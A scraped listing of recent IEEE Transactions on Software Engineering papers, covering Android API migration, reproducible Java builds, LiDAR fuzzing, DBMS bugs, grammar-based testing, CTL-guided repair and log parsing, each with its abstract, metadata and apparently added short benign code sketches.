Pub Date: 2025-11-03, DOI: 10.1109/TSE.2025.3627897
Tarek Mahmud;Bin Duan;Meiru Che;Awatif Yasmin;Anne H. H. Ngu;Guowei Yang
Android apps rely on application programming interfaces (APIs) to access various functionalities of Android devices. These APIs, however, are regularly updated to incorporate new features, while old APIs are deprecated. Even though the importance of updating deprecated API usages with the recommended replacement APIs is widely recognized, performing such updates is non-trivial. As a result, deprecated API usages linger in Android apps and cause compatibility issues in practice. This paper introduces GUPPY, an automated approach that utilizes large language models (LLMs) to update Android deprecated API usages. By employing carefully crafted Chain-of-Thought prompts, GUPPY leverages GPT-4, one of the most powerful LLMs, to update deprecated API usages, ensuring compatibility at both the old and new API levels. Additionally, GUPPY uses GPT-4 to generate tests, identify incorrect updates, and refine the API usage through an iterative process until the tests pass or a specified limit is reached. Our evaluation, conducted on 360 benchmark API usages from 20 deprecated APIs and an additional 156 deprecated API usages from the latest API levels 33 and 34, demonstrates GUPPY’s advantages over state-of-the-art techniques.
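A minimal sketch of the iterative "update, test, refine" loop the abstract describes; it is not GUPPY's actual pipeline or prompts. `call_llm` and `run_tests` are hypothetical placeholders for a GPT-4-style client and a test harness.

```python
# Sketch only: the prompts and helper functions are illustrative assumptions,
# not GUPPY's real ones.
MAX_REFINEMENTS = 5  # the "specified limit" on refinement iterations

def call_llm(prompt: str) -> str:
    raise NotImplementedError("wire up an LLM client (e.g., GPT-4) here")

def run_tests(code: str, tests: str) -> tuple[bool, str]:
    raise NotImplementedError("compile and execute the generated tests here")

def update_deprecated_usage(snippet: str, deprecated: str, replacement: str) -> str:
    # Step 1: ask the LLM for an update guarded for both old and new API levels.
    code = call_llm(
        f"Rewrite this Android code, replacing `{deprecated}` with "
        f"`{replacement}` behind Build.VERSION.SDK_INT checks so it works "
        f"on both old and new API levels:\n{snippet}")
    # Step 2: ask the LLM to generate tests for the updated usage.
    tests = call_llm(f"Generate unit tests for the updated API usage:\n{code}")
    # Step 3: refine iteratively until the tests pass or the limit is reached.
    for _ in range(MAX_REFINEMENTS):
        passed, log = run_tests(code, tests)
        if passed:
            break
        code = call_llm(f"The tests failed:\n{log}\nFix the update:\n{code}")
    return code
```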
{"title":"Automated Update of Android Deprecated API Usages With Large Language Models","authors":"Tarek Mahmud;Bin Duan;Meiru Che;Awatif Yasmin;Anne H. H. Ngu;Guowei Yang","doi":"10.1109/TSE.2025.3627897","DOIUrl":"10.1109/TSE.2025.3627897","url":null,"abstract":"Android apps rely on application programming interfaces (APIs) to access various functionalities of Android devices. These APIs however are regularly updated to incorporate new features while the old APIs get deprecated. Even though the importance of updating deprecated API usages with the recommended replacement APIs has been widely recognized, it is non-trivial to update the deprecated API usages. Therefore, the usages of deprecated APIs linger in Android apps and cause compatibility issues in practice. This paper introduces GUPPY, an automated approach that utilizes large language models (LLMs) to update Android deprecated API usages. By employing carefully crafted Chain-of-Thoughts prompts, GUPPY leverages GPT-4, one of the most powerful LLMs, to update deprecated-API usages, ensuring compatibility in both the old and new API levels. Additionally, GUPPY uses GPT-4 to generate tests, identify incorrect updates, and refine the API usage through an iterative process until the tests pass or a specified limit is reached. Our evaluation, conducted on 360 benchmark API usages from 20 deprecated APIs and an additional 156 deprecated API usages from the latest API levels 33 and 34, demonstrates GUPPY’s advantages over the state-of-the-art techniques.","PeriodicalId":13324,"journal":{"name":"IEEE Transactions on Software Engineering","volume":"52 1","pages":"70-85"},"PeriodicalIF":5.6,"publicationDate":"2025-11-03","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"145434090","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":1,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
Pub Date: 2025-11-03, DOI: 10.1109/TSE.2025.3627891
Aman Sharma;Benoit Baudry;Martin Monperrus
The increasing complexity of software supply chains and the rise of supply chain attacks have elevated concerns around software integrity. Users and stakeholders face significant challenges in validating that a given software artifact corresponds to its declared source. Reproducible Builds address this challenge by ensuring that independently performed builds from identical source code produce identical binaries. However, achieving reproducibility at scale remains difficult, especially in Java, due to a range of non-deterministic factors and caveats in the build process. In this work, we focus on reproducibility in Java-based software, archetypal of enterprise applications. We introduce a conceptual framework for reproducible builds, we analyze a large dataset from Reproducible Central, and we develop a novel taxonomy of six root causes of unreproducibility. We study actionable mitigations: artifact and bytecode canonicalization using OSS-Rebuild and jNorm, respectively. Finally, we present Chains-Rebuild (improvements to OSS-Rebuild), a tool that raises reproducibility success from 9.48% to 26.60% on 12,803 unreproducible artifacts. To sum up, our contributions are the first large-scale taxonomy of build unreproducibility causes in Java, a publicly available dataset of unreproducible builds, and Chains-Rebuild, a canonicalization tool for mitigating unreproducible builds in Java.
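A toy analogue of the archive canonicalization idea: repack a jar/zip with sorted entries and fixed timestamps before hashing, neutralizing two classic root causes of unreproducibility (entry order and embedded build times). Real tools such as OSS-Rebuild and jNorm handle many more cases, including bytecode-level differences; this sketch only illustrates the principle.

```python
import hashlib
import io
import zipfile

def canonical_digest(jar_path: str) -> str:
    """Hash a jar/zip after normalizing known-benign differences."""
    buf = io.BytesIO()
    with zipfile.ZipFile(jar_path) as src, \
         zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as dst:
        for name in sorted(src.namelist()):            # canonical entry order
            info = zipfile.ZipInfo(name, date_time=(1980, 1, 1, 0, 0, 0))
            dst.writestr(info, src.read(name))          # canonical timestamp
    return hashlib.sha256(buf.getvalue()).hexdigest()

def reproducible(build_a: str, build_b: str) -> bool:
    # Two independent builds are (canonically) reproducible iff their
    # canonicalized artifacts hash to the same digest.
    return canonical_digest(build_a) == canonical_digest(build_b)
```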
{"title":"Causes and Canonicalization of Unreproducible Builds in Java","authors":"Aman Sharma;Benoit Baudry;Martin Monperrus","doi":"10.1109/TSE.2025.3627891","DOIUrl":"10.1109/TSE.2025.3627891","url":null,"abstract":"The increasing complexity of software supply chains and the rise of supply chain attacks have elevated concerns around software integrity. Users and stakeholders face significant challenges in validating that a given software artifact corresponds to its declared source. Reproducible Builds address this challenge by ensuring that independently performed builds from identical source code produce identical binaries. However, achieving reproducibility at scale remains difficult, especially in Java, due to a range of non-deterministic factors and caveats in the build process. In this work, we focus on reproducibility in Java-based software, archetypal of enterprise applications. We introduce a conceptual framework for reproducible builds, we analyze a large dataset from Reproducible Central, and we develop a novel taxonomy of six root causes of unreproducibility. We study actionable mitigations: artifact and bytecode canonicalization using <sc>OSS-Rebuild</small> and <sc>jNorm</small> respectively. Finally, we present <sc>Chains-Rebuild</small> (improvements to <sc>OSS-Rebuild</small>), a tool that raises reproducibility success from 9.48% to 26.60% on <sc>12,803</small> unreproducible artifacts. To sum up, our contributions are the first large-scale taxonomy of build unreproducibility causes in Java, a publicly available dataset of unreproducible builds, and <sc>Chains-Rebuild</small>, a canonicalization tool for mitigating unreproducible builds in Java.","PeriodicalId":13324,"journal":{"name":"IEEE Transactions on Software Engineering","volume":"52 1","pages":"54-69"},"PeriodicalIF":5.6,"publicationDate":"2025-11-03","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=11223991","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"145434092","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":1,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"OA","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
Pub Date: 2025-10-31, DOI: 10.1109/TSE.2025.3627580
An Guo;Zhiwei Su;Xinyu Gao;Chunrong Fang;Senrong Wang;Haoxiang Tian;Wu Wen;Lei Ma;Zhenyu Chen
Autonomous driving systems (ADSs) have the potential to enhance safety through advanced perception and reaction capabilities, reduce emissions by alleviating congestion, and contribute to various improvements in quality of life. Despite significant advancements in ADSs, several real-world accidents resulting in fatalities have occurred due to failures in the autonomous driving perception modules. As a critical component of autonomous vehicles, LiDAR-based perception systems are marked by high complexity and low interpretability, necessitating the development of effective testing methods for these systems. Current testing methods largely depend on manual data collection and labeling, which restricts their ability to detect a diverse range of erroneous behaviors. This process is not only time-consuming and labor-intensive, but it may also result in the recurrent discovery of similar erroneous behaviors during testing, hindering a comprehensive assessment of the systems. In this paper, we propose and implement a fuzzing framework for LiDAR-based autonomous driving perception systems, named LDFuzz, grounded in metamorphic testing theory. This framework offers the first uniform solution for the automated generation of tests with oracle information. To enhance testing efficiency and increase the number of tests that identify erroneous behaviors, we incorporate spatial and semantic coverage based on the characteristics of point cloud data to guide the generation process. We evaluate the performance of LDFuzz through experiments conducted on four LiDAR-based autonomous driving perception systems designed for the 3D object detection task. The experimental results demonstrate that the tests produced by LDFuzz can effectively detect an average of 7.5% more erroneous behaviors within LiDAR-based perception systems than the best-performing baseline. Furthermore, the findings indicate that LDFuzz significantly enhances the diversity of failed tests.
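A minimal sketch of one kind of metamorphic relation such a framework can check: after inserting a new object into a point cloud, detections of the untouched objects should persist. The `detect` stub, box format, and tolerance are illustrative assumptions, not LDFuzz's actual mutation operators or oracle.

```python
import numpy as np

def detect(points: np.ndarray) -> list[tuple[float, float, float, str]]:
    """Placeholder for a 3D object detector returning (x, y, z, label) boxes."""
    raise NotImplementedError("plug in a LiDAR-based 3D object detector here")

def insert_object(points: np.ndarray, obj_points: np.ndarray, offset) -> np.ndarray:
    # Mutation: rigidly place an object's points into the scene at `offset`.
    return np.vstack([points, obj_points + np.asarray(offset)])

def violates_relation(points, obj_points, offset, tol=0.5) -> bool:
    before = detect(points)
    after = detect(insert_object(points, obj_points, offset))
    # Oracle: every object detected before must still be detected afterwards.
    for (x, y, z, label) in before:
        if not any(label == l2 and abs(x - x2) + abs(y - y2) + abs(z - z2) < tol
                   for (x2, y2, z2, l2) in after):
            return True  # erroneous behavior: the insertion erased a detection
    return False
```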
{"title":"Spatial Semantic Fuzzing for LiDAR-Based Autonomous Driving Perception Systems","authors":"An Guo;Zhiwei Su;Xinyu Gao;Chunrong Fang;Senrong Wang;Haoxiang Tian;Wu Wen;Lei Ma;Zhenyu Chen","doi":"10.1109/TSE.2025.3627580","DOIUrl":"10.1109/TSE.2025.3627580","url":null,"abstract":"Autonomous driving systems (ADSs) have the potential to enhance safety through advanced perception and reaction capabilities, reduce emissions by alleviating congestion, and contribute to various improvements in quality of life. Despite significant advancements in ADSs, several real-world accidents resulting in fatalities have occurred due to failures in the autonomous driving perception modules. As a critical component of autonomous vehicles, LiDAR-based perception systems are marked by high complexity and low interpretability, necessitating the development of effective testing methods for these systems. Current testing methods largely depend on manual data collection and labeling, which restricts their ability to detect a diverse range of erroneous behaviors. This process is not only time-consuming and labor-intensive, but it may also result in the recurrent discovery of similar erroneous behaviors during testing, hindering a comprehensive assessment of the systems. In this paper, we propose and implement a fuzzing framework for LiDAR-based autonomous driving perception systems, named LDFuzz, grounded in metamorphic testing theory. This framework offers the first uniform solution for the automated generation of tests with oracle information. To enhance testing efficiency and increase the number of tests that identify erroneous behaviors, we incorporate spatial and semantic coverage based on the characteristics of point cloud data to guide the generation process. We evaluate the performance of LDFuzz through experiments conducted on four LiDAR-based autonomous driving perception systems designed for the 3D object detection task. The experimental results demonstrate that the tests produced by LDFuzz can effectively detect an average of 7.5% more erroneous behaviors within LiDAR-based perception systems than the optimal baseline. Furthermore, the findings indicate that LDFuzz significantly enhances the diversity of failed tests.","PeriodicalId":13324,"journal":{"name":"IEEE Transactions on Software Engineering","volume":"52 1","pages":"187-205"},"PeriodicalIF":5.6,"publicationDate":"2025-10-31","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"145412132","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":1,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
Pub Date: 2025-10-31, DOI: 10.1109/TSE.2025.3625300
Shuang Liu;Ruifeng Wang;Yuanfeng Xie;Junjie Chen;Wei Lu;Xiao Zhang;Quanqing Xu;Chuanhui Yang;Xiaoyong Du
Relational Database Management Systems (RDBMSs) are crucial infrastructures supporting a wide range of applications, making bug mitigation within these systems essential. This study presents the first comprehensive analysis of bugs in three popular open-source RDBMSs: MySQL, SQLite, and openGauss. We manually examined 777 bugs across four dimensions, i.e., bug root causes, bug symptoms, bug distribution across modules, and the correlations between the studied aspects. We also analyzed the bug-triggering SQL statements to uncover test cases that cannot be generated by existing tools. We distill 12 findings, which shed light on the development, maintenance, and testing of RDBMSs. In particular, our findings reveal that bugs related to SQL data types and complex features, such as database triggers, procedures, and database parameter settings, present significant opportunities for enhancing RDBMS bug detection and mitigation. Leveraging these insights, we developed a tool, SQLT, which effectively identified eight RDBMS bugs (five type-related), all verified by developers, with four subsequently fixed.
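An illustrative probe for the data-type-related bug category the study highlights: run two predicates that should agree despite implicit type conversion, and flag any divergence. It uses SQLite from the Python standard library; the specific probes are examples, not SQLT's actual test-generation rules.

```python
import sqlite3

con = sqlite3.connect(":memory:")
con.execute("CREATE TABLE t (a TEXT, b INTEGER)")
con.execute("INSERT INTO t VALUES ('10', 10)")

# Two predicates that should agree on this data: one relies on implicit
# type conversion (column affinity), the other makes the cast explicit.
q1 = con.execute("SELECT COUNT(*) FROM t WHERE a = 10").fetchone()[0]
q2 = con.execute("SELECT COUNT(*) FROM t WHERE CAST(a AS INTEGER) = b").fetchone()[0]

# A divergence here would indicate a type-handling inconsistency.
print("consistent" if q1 == q2 else f"divergence: {q1} vs {q2}")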
{"title":"A Comprehensive Study of Bugs in Relational DBMS","authors":"Shuang Liu;Ruifeng Wang;Yuanfeng Xie;Junjie Chen;Wei Lu;Xiao Zhang;Quanqing Xu;Chuanhui Yang;Xiaoyong Du","doi":"10.1109/TSE.2025.3625300","DOIUrl":"10.1109/TSE.2025.3625300","url":null,"abstract":"Relational Database Management Systems (RDBMSs) are crucial infrastructures supporting a wide range of applications, making bug mitigation within these systems essential. This study presents the first comprehensive analysis of bugs in three popular open-source RDBMSs—MySQL, SQLite, and openGauss. We manually examined 777 bugs across four dimensions, i.e., bug root causes, bug symptoms, bug distribution across modules, and the correlations between the studied aspects. We also analyzed the bug-triggering SQL statements to uncover test cases that cannot be generated by existing tools. We have made 12 findings, which throw lights on the development, maintenance and testing of RDBMS systems. Particularly, our findings reveal that bugs related to SQL data types and complex features, such as database triggers, procedures and database parameter settings, present significant opportunities for enhancing RDBMS bug detection and mitigation. Leveraging these insights, we developed a tool, <sc>SQLT</small>, which effectively identified eight RDBMS bugs (five type-related), all verified by developers, with four subsequently fixed.","PeriodicalId":13324,"journal":{"name":"IEEE Transactions on Software Engineering","volume":"51 12","pages":"3654-3668"},"PeriodicalIF":5.6,"publicationDate":"2025-10-31","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"145412135","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":1,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
Pub Date: 2025-10-30, DOI: 10.1109/TSE.2025.3627220
Lukas Kirschner;Ezekiel Soremekun
Context: To effectively test complex software, it is important to generate goal-specific inputs, i.e., inputs that achieve a specific testing goal. For instance, developers may target one or more testing goals during testing, such as generating complex inputs or triggering new or error-prone behaviors. Problem: However, most state-of-the-art test generators are not designed to target specific goals. Notably, grammar-based test generators, which (randomly) produce syntactically valid inputs via an input specification (i.e., grammar), have a low probability of achieving an arbitrary testing goal. Aim: This work addresses this challenge by proposing an automated test generation approach (called FdLoop) which iteratively learns relevant input properties from existing inputs to drive the generation of goal-specific inputs. Method: The main idea of our approach is to leverage test feedback to generate goal-specific inputs via a combination of evolutionary testing and grammar learning. FdLoop automatically learns a mapping between input structures and a specific testing goal; such mappings allow it to generate inputs that target the goal at hand. Given a testing goal, FdLoop iteratively selects, evolves, and learns the input distribution of goal-specific test inputs via test feedback and a probabilistic grammar. We concretize FdLoop for four testing goals, namely unique code coverage, input-to-code complexity, program failures (exceptions), and long execution time. We evaluate FdLoop using three well-known input formats (JSON, CSS, and JavaScript) and 20 open-source software projects. Results: In most (86%) settings, FdLoop outperforms all five tested baselines, namely grammar-based test generators (random, probabilistic, and inverse-probabilistic methods), EvoGFuzz, and DynaMOSA. FdLoop is up to twice (2x) as effective as the best baseline (EvoGFuzz) in inducing erroneous behaviors. In addition, we show that the main components of FdLoop (i.e., the input mutator, grammar mutator, and test feedback) contribute positively to its effectiveness. We also observed that FdLoop is effective across varying parameter settings: the number of initial seed inputs, the number of generated inputs, the number of input generations, and random seed values. Implications: Finally, our evaluation demonstrates that FdLoop effectively achieves single testing goals (revealing erroneous behaviors, generating complex inputs, or inducing long execution time) and scales to multiple testing goals.
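A condensed sketch of the feedback loop the abstract describes: sample inputs from a probabilistic grammar, score them against a testing goal, and re-learn production weights from the best performers. The toy grammar, the goal (longer numeric inputs, standing in for input complexity), and the crude learning rule are illustrative assumptions, not FdLoop's actual grammars or update scheme.

```python
import random

GRAMMAR = {"<num>": [["<digit>"], ["<digit>", "<num>"]],
           "<digit>": [[d] for d in "0123456789"]}
weights = {nt: [1.0] * len(alts) for nt, alts in GRAMMAR.items()}

def generate(symbol="<num>", depth=0):
    if symbol not in GRAMMAR:
        return symbol                                   # terminal token
    alts = GRAMMAR[symbol]
    if depth > 50:
        choice = alts[0]                                # force termination
    else:
        choice = random.choices(alts, weights=weights[symbol])[0]
    return "".join(generate(s, depth + 1) for s in choice)

def goal(inp: str) -> float:
    return float(len(inp))                              # toy complexity goal

for _ in range(5):                                      # evolutionary iterations
    population = [generate() for _ in range(200)]
    best = sorted(population, key=goal, reverse=True)[:20]
    # Feedback: bias <num> toward its recursive alternative when the
    # best inputs score well, i.e., learn the goal-specific distribution.
    weights["<num>"][1] = 1.0 + sum(map(goal, best)) / len(best) / 10.0

print(max(population, key=goal))
```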
{"title":"Directed Grammar-Based Test Generation","authors":"Lukas Kirschner;Ezekiel Soremekun","doi":"10.1109/TSE.2025.3627220","DOIUrl":"10.1109/TSE.2025.3627220","url":null,"abstract":"<bold>Context:</b> To effectively test complex software, it is important to generate <italic>goal-specific inputs</i>, i.e., inputs that achieve a specific testing goal. For instance, developers may intend to target one or more testing goal(s) during testing – generate complex inputs or trigger new or error-prone behaviors. <bold>Problem:</b> However, most state-of-the-art test generators are not designed to <italic>target specific goals.</i> Notably, grammar-based test generators, which (randomly) produce <italic>syntactically valid inputs</i> via an input specification (i.e., grammar) have a low probability of achieving an arbitrary testing goal. <bold>Aim:</b> This work addresses this challenge by proposing an automated test generation approach (called <sc>FdLoop</small>) which iteratively learns relevant input properties from existing inputs to drive the generation of goal-specific inputs. <bold>Method:</b> The main idea of our approach is to leverage <italic>test feedback</i> to generate <italic>goal-specific inputs</i> via a combination of <italic>evolutionary testing</i> and <italic>grammar learning</i>. <sc>FdLoop</small> automatically learns a mapping between input structures and a specific testing goal, such mappings allow to generate inputs that target the goal-at-hand. Given a testing goal, <sc>FdLoop</small> iteratively selects, evolves and learn the input distribution of goal-specific test inputs via test feedback and a probabilistic grammar. We concretize <sc>FdLoop</small> for four testing goals, namely unique code coverage, input-to-code complexity, program failures (exceptions) and long execution time. We evaluate <sc>FdLoop</small> using three (3) well-known input formats (JSON, CSS and JavaScript) and 20 open-source software. <bold>Results:</b> In most (86%) settings, <sc>FdLoop</small> outperforms all five tested baselines namely the baseline grammar-based test generators (random, probabilistic and inverse-probabilistic methods), EvoGFuzz and DynaMOSA. <sc>FdLoop</small> is (up to) twice (2X) as effective as the best baseline (EvoGFuzz) in inducing erroneous behaviors. In addition, we show that the main components of <sc>FdLoop</small> (i.e., input mutator, grammar mutator and test feedbacks) contribute positively to its effectiveness. We also observed that <sc>FdLoop</small> is effective across varying parameter settings – the number of initial seed inputs, the number of generated inputs, the number of input generations and varying random seed values. 
<bold>Implications:</b> Finally, our evaluation demonstrates that <sc>FdLoop</small> effectively achieves single testing goals (revealing erroneous behaviors, generating complex inputs, or inducing long execution time) and scales to multiple testing goals.","PeriodicalId":13324,"journal":{"name":"IEEE Transactions on Software Engineering","volume":"51 12","pages":"3669-3691"},"PeriodicalIF":5.6,"publicationDate":"2025-10-30","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"145404155","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":1,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
Temporal logics like Computation Tree Logic (CTL) have been widely used as expressive formalisms to capture rich behavioural specifications. CTL can express properties such as reachability, termination, invariants and responsiveness, which are difficult to test. This paper suggests a mechanism for the automated repair of infinite-state programs guided by CTL properties. Our produced patches avoid the overfitting issue that occurs in test-suite-guided repair, where the repaired code may not pass tests outside the given test suite. To realise this vision, we propose a novel find-and-fix framework based on Datalog, a widely used domain-specific language for program analysis, which readily supports nested fixed-point semantics of CTL via stratified negation. Specifically, our framework encodes the program and CTL properties into Datalog facts and rules and performs the repair by modifying the facts to pass the analysis rules. In the framework, to achieve both analysis and repair results, we adapt existing techniques – including loop summarisation and Symbolic Execution of Datalog (SEDL) – with key modifications. Our approach achieves analysis accuracy of 56.6% on a CTL verification benchmark and 88.5% on a termination/responsiveness benchmark, surpassing the best baseline performances of 27.7% and 76.9%, respectively. Our approach repairs all detected bugs, which is not achieved by existing tools.
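A toy rendering of the encoding idea: program transitions become facts, and a CTL property such as EF(error) becomes a recursive rule evaluated to a least fixed point. A tiny Python solver stands in for a real Datalog engine (and for the paper's stratified negation, which handles nested CTL operators); the states and transitions are made up for illustration.

```python
# Facts: trans(S, T) and error(S), as they would appear in Datalog.
transitions = {("s0", "s1"), ("s1", "s2"), ("s2", "s2")}
error_states = {"s2"}

def ef(targets: set[str]) -> set[str]:
    """States satisfying EF(target): least fixed point of
       ef(S) :- target(S).   ef(S) :- trans(S, T), ef(T)."""
    sat = set(targets)
    changed = True
    while changed:
        changed = False
        for (s, t) in transitions:
            if t in sat and s not in sat:
                sat.add(s)
                changed = True
    return sat

# AG(not error) holds in s0 iff s0 cannot reach an error state; a repair
# would modify the transition facts until the property passes.
print("repair needed" if "s0" in ef(error_states) else "property holds")
```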
{"title":"Computation Tree Logic Guided Program Repair","authors":"Yu Liu;Yahui Song;Martin Mirchev;Abhik Roychoudhury","doi":"10.1109/TSE.2025.3625772","DOIUrl":"10.1109/TSE.2025.3625772","url":null,"abstract":"Temporal logics like Computation Tree Logic (CTL) have been widely used as expressive formalisms to capture rich behavioural specifications. CTL can express properties such as reachability, termination, invariants and responsiveness, which are difficult to test. This paper suggests a mechanism for the automated repair of infinite-state programs guided by CTL properties. Our produced patches avoid the overfitting issue that occurs in test-suite-guided repair, where the repaired code may not pass tests outside the given test suite. To realise this vision, we propose a novel find-and-fix framework based on Datalog, a widely used domain-specific language for program analysis, which readily supports nested fixed-point semantics of CTL via stratified negation. Specifically, our framework encodes the program and CTL properties into Datalog facts and rules and performs the repair by modifying the facts to pass the analysis rules. In the framework, to achieve both analysis and repair results, we adapt existing techniques – including loop summarisation and Symbolic Execution of Datalog (SEDL) – with key modifications. Our approach achieves analysis accuracy of 56.6% on a CTL verification benchmark and 88.5% on a termination/responsiveness benchmark, surpassing the best baseline performances of 27.7% and 76.9%, respectively. Our approach repairs all detected bugs, which is not achieved by existing tools.","PeriodicalId":13324,"journal":{"name":"IEEE Transactions on Software Engineering","volume":"52 1","pages":"321-337"},"PeriodicalIF":5.6,"publicationDate":"2025-10-27","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=11218954","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"145381252","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":1,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"OA","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
Logs of large-scale cloud systems record diverse system events, ranging from routine statuses to critical errors. As the fundamental step of automated log analysis, log parsing transforms unstructured logs into structured data for easier management and analysis. However, existing syntax-based and deep learning-based parsers struggle with complex real-world logs. Recent parsers based on large language models (LLMs) achieve higher accuracy, but they typically rely on online APIs (e.g., ChatGPT), raising privacy concerns and suffering from network latency. Moreover, with the rise of artificial intelligence for IT operations (AIOps), traditional parsers that focus on syntax-level templates fail to capture the semantics of dynamic log parameters, limiting their usefulness for downstream tasks. These challenges highlight the need for semantic log parsing that goes beyond template extraction to understand parameter semantics. This paper presents SemanticLog, an effective and efficient semantic log parser powered by open-source LLMs. SemanticLog adapts the structure of LLMs to the log parsing task, leveraging their rich knowledge while safeguarding log data privacy. It first extracts informative feature representations from log data, then refines them through fine-grained semantic perception to enable accurate template and parameter extraction together with semantic category prediction. To boost scalability, SemanticLog introduces the EffiParsing tree for faster inference on large-scale logs. Extensive experiments on the LogHub-2.0 dataset show that SemanticLog significantly outperforms state-of-the-art log parsers in terms of accuracy. Moreover, it also surpasses existing LLM-based parsers in efficiency while showcasing advanced semantic parsing capability. Notably, SemanticLog employs much smaller open-source LLMs than existing LLM-based parsers (mainly based on ChatGPT), while providing stronger log data privacy protection.
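A simplified token-prefix tree for fast template lookup, analogous in spirit to the EffiParsing tree mentioned above (whose actual design may differ). Templates use "<*>" as the parameter wildcard; exact tokens are tried before wildcards so the most specific template wins.

```python
class Node:
    def __init__(self):
        self.children: dict[str, "Node"] = {}
        self.template: str | None = None

root = Node()

def insert(template: str) -> None:
    node = root
    for tok in template.split():
        node = node.children.setdefault(tok, Node())
    node.template = template

def match(log_line: str) -> str | None:
    def walk(node: Node, toks: list[str]) -> str | None:
        if not toks:
            return node.template
        for key in (toks[0], "<*>"):        # exact token first, then wildcard
            child = node.children.get(key)
            if child:
                found = walk(child, toks[1:])
                if found:
                    return found
        return None
    return walk(root, log_line.split())

insert("Connected to <*> port <*>")
print(match("Connected to 10.0.0.1 port 8080"))  # -> "Connected to <*> port <*>"
```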
{"title":"SemanticLog: Towards Effective and Efficient Large-Scale Semantic Log Parsing","authors":"Chenbo Zhang;Wenying Xu;Jinbu Liu;Lu Zhang;Guiyang Liu;Jihong Guan;Qi Zhou;Shuigeng Zhou","doi":"10.1109/TSE.2025.3625121","DOIUrl":"10.1109/TSE.2025.3625121","url":null,"abstract":"Logs of large-scale cloud systems record diverse system events, ranging from routine statuses to critical errors. As the fundamental step of automated log analysis, log parsing is to transform unstructured logs into structured data for easier management and analysis. However, existing syntax-based and deep learning-based parsers struggle with complex real-world logs. Recent parsers based on large language models (LLMs) achieve higher accuracy, but they typically rely on online APIs (e.g., ChatGPT), raising privacy concerns and suffering from network latency. Moreover, with the rise of artificial intelligence for IT operations (AIOps), traditional parsers that focus on syntax-level templates fail to capture the semantics of dynamic log parameters, limiting their usefulness for downstream tasks. These challenges highlight the need for semantic log parsing that goes beyond template extraction to understand parameter semantics. This paper presents <bold>SemanticLog</b>, an effective and efficient semantic log parser powered by open-source LLMs. SemanticLog adapts the structure of LLMs to the log parsing task, leveraging their rich knowledge while safeguarding log data privacy. It first extracts informative feature representations from log data, then refines them through fine-grained semantic perception to enable accurate template and parameter extraction together with semantic category prediction. To boost scalability, SemanticLog introduces the EffiParsing tree for faster inference on large-scale logs. Extensive experiments on the LogHub-2.0 dataset show that SemanticLog significantly outperforms the state-of-the-art log parsers in terms of accuracy. Moreover, it also surpasses existing LLM-based parsers in efficiency while showcasing advanced semantic parsing capability. Notably, SemanticLog employs much smaller open-source LLMs compared to existing LLM-based parsers (mainly based on ChatGPT), while maintaining better capability of log data privacy protection.","PeriodicalId":13324,"journal":{"name":"IEEE Transactions on Software Engineering","volume":"52 1","pages":"155-170"},"PeriodicalIF":5.6,"publicationDate":"2025-10-24","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"145381322","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":1,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
Pub Date: 2025-10-23, DOI: 10.1109/TSE.2025.3624631
Mohamed Sami Rakha;Andriy Miranskyy;Daniel Alencar da Costa
